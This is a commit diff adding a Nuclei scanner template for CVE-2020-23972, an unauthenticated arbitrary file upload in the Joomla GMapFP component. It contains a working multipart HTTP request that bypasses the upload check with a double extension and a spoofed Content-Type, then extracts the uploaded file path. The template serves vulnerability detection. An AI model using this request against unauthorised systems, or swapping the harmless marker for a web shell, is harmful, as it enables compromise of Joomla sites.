Merge pull request #658 from dwisiswant0/add/CVE-2020-23972

Add CVE-2020-23972 [verified]

cves/CVE-2020-23972.yaml

@@ -0,0 +1,48 @@
+id: cve-2020-23972
+
+info:
+  name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
+  author: dwisiswant0
+  severity: high
+  description: |
+    An attacker can access the upload function of the application
+    without authenticating to the application and also can upload
+    files due the issues of unrestricted file upload which can be
+    bypassed by changing Content-Type & name file too double ext.
+
+  # Source: https://www.exploit-db.com/exploits/49129
+
+requests:
+  - payloads:
+      component:
+        - "com_gmapfp"
+        - "comgmapfp"
+    raw:
+      - |
+        POST /index.php?option=§component§&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+        Referer: {{BaseURL}}
+        Connection: close
+
+        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+        Content-Disposition: form-data; name="option"
+
+        com_gmapfp
+        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
+        Content-Type: text/html
+
+        projectdiscovery
+
+        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+        Content-Disposition: form-data; name="no_html"
+
+        no_html
+        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"